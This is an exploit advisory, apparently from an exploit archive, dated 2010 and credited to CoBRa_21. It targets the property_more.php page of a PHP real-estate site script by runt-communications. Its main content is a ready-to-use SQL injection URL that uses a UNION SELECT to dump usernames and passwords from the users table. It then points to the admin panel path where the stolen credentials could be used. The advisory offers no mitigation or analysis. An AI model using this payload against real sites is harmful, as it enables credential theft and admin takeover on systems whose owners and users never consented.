id: 12380
date: 05/24/2010
title: runt-communications Design (property_more.php) SQL Injection
author: CoBRa_21
cves: 

============================================================
runt-communications Design (property_more.php) SQL Injection
============================================================


Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Home: http://runtcommunications.com
 
-------------------------------------------------------------------------------------------
 
Sql Injection:
 
http://localhost/[path]/property_more.php?id=-9999 union select 0,version(),2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11 from users
 
Admin Panel
 
http://localhost/[path]/admin
------------------------------------------------------------------------------------------- 



#  0day.today [2023-03-24]  #